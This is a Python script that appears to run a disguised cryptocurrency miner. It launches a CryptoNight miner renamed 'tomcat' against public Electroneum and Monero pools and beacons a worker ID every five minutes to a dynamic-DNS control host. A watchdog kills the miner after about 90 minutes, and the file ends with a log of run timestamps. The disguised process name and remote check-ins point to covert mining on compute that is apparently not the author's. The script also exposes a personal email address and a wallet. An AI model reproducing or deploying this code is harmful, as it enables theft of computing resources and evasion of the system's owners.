import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:07:04.084815
#2018-02-17 15:54:03.307979
#2018-02-17 17:41:01.890812
#2018-02-17 19:27:07.349743
#2018-02-17 21:16:06.062139
#2018-02-17 23:00:05.077490
#2018-02-18 00:46:07.455423
#2018-02-18 02:35:05.647643
#2018-02-18 04:22:06.000452
#2018-02-18 06:13:04.037542
#2018-02-18 08:04:05.516114
#2018-02-18 09:52:06.701726
#2018-02-18 11:39:04.242670
#2018-02-18 13:24:06.891937
#2018-02-18 15:14:04.969469
#2018-02-18 17:03:07.558599
#2018-02-18 18:49:07.072716
#2018-02-18 20:35:01.422563
#2018-02-18 22:21:04.692247
#2018-02-19 00:10:06.254399
#2018-02-19 01:56:01.893279
#2018-02-19 03:43:05.315886
#2018-02-19 05:28:05.814490
#2018-02-19 07:16:01.510465
#2018-02-19 09:04:04.986203
#2018-02-19 10:51:05.606523
#2018-02-19 12:39:06.847236
#2018-02-19 14:26:07.940532
#2018-02-19 16:14:01.372297
#2018-02-19 18:00:12.657438
#2018-02-19 19:46:08.359295
#2018-02-19 21:34:01.341252
#2018-02-19 23:20:07.213143
#2018-02-20 01:06:07.095703
#2018-02-20 02:54:07.634194
#2018-02-20 04:43:07.867693
#2018-02-20 06:27:04.999409
#2018-02-20 08:12:05.262159
#2018-02-20 09:58:01.433806
#2018-02-20 11:42:06.138490
#2018-02-20 13:29:07.067766
#2018-02-20 15:13:09.274314
#2018-02-20 16:57:13.209570
#2018-02-20 18:46:08.578385
#2018-02-20 20:37:03.490545
#2018-02-20 22:21:04.173401
#2018-02-21 00:02:07.712434
#2018-02-21 01:47:05.018343
#2018-02-21 03:33:07.160743
#2018-02-21 05:22:05.236684
#2018-02-21 07:09:04.662448
#2018-02-21 08:56:06.371442
#2018-02-21 10:46:09.426285
#2018-02-21 12:33:05.434549
#2018-02-21 14:19:01.371823
#2018-02-21 16:07:06.637616
#2018-02-21 17:58:06.855721
#2018-02-21 19:44:08.505657
#2018-02-21 21:32:08.684617
#2018-02-21 23:21:06.079519
#2018-02-22 01:10:01.314699
#2018-02-22 02:56:08.382135
#2018-02-22 04:43:04.121279
#2018-02-22 06:28:04.974537
#2018-02-22 08:15:06.364762
#2018-02-22 10:03:06.855571
#2018-02-22 11:46:16.167767
#2018-02-22 13:33:04.779478
#2018-02-22 15:21:06.126942
#2018-02-22 17:07:07.555084
#2018-02-22 18:55:01.648120
#2018-02-22 20:47:01.677862
#2018-02-22 22:32:07.202776
#2018-02-23 00:17:07.595475
#2018-02-23 02:06:08.005035
#2018-02-23 03:53:07.853973
#2018-02-23 05:40:09.965221
#2018-02-23 07:25:03.027294
#2018-02-23 09:29:05.801177
#2018-02-23 11:36:08.824059
#2018-02-23 13:26:04.931470
#2018-02-23 15:11:08.802031
#2018-02-23 16:59:01.516260
#2018-02-23 19:07:02.138037
#2018-02-23 20:52:05.325389
#2018-02-23 22:39:07.841185
#2018-02-24 00:26:06.142056
#2018-02-24 02:17:04.156033
#2018-02-24 04:06:02.227853
#2018-02-24 05:52:06.702216
#2018-02-24 07:41:05.350000
#2018-02-24 09:26:01.790389
#2018-02-24 11:19:03.928446
#2018-02-24 13:08:07.844602
#2018-02-24 14:59:05.047694
#2018-02-24 16:48:08.222067
#2018-02-24 18:37:01.527293
#2018-02-24 20:28:04.067243
#2018-02-24 22:25:03.545379
#2018-02-25 01:34:03.462852
#2018-02-25 04:54:03.405978
#2018-02-25 08:21:01.302227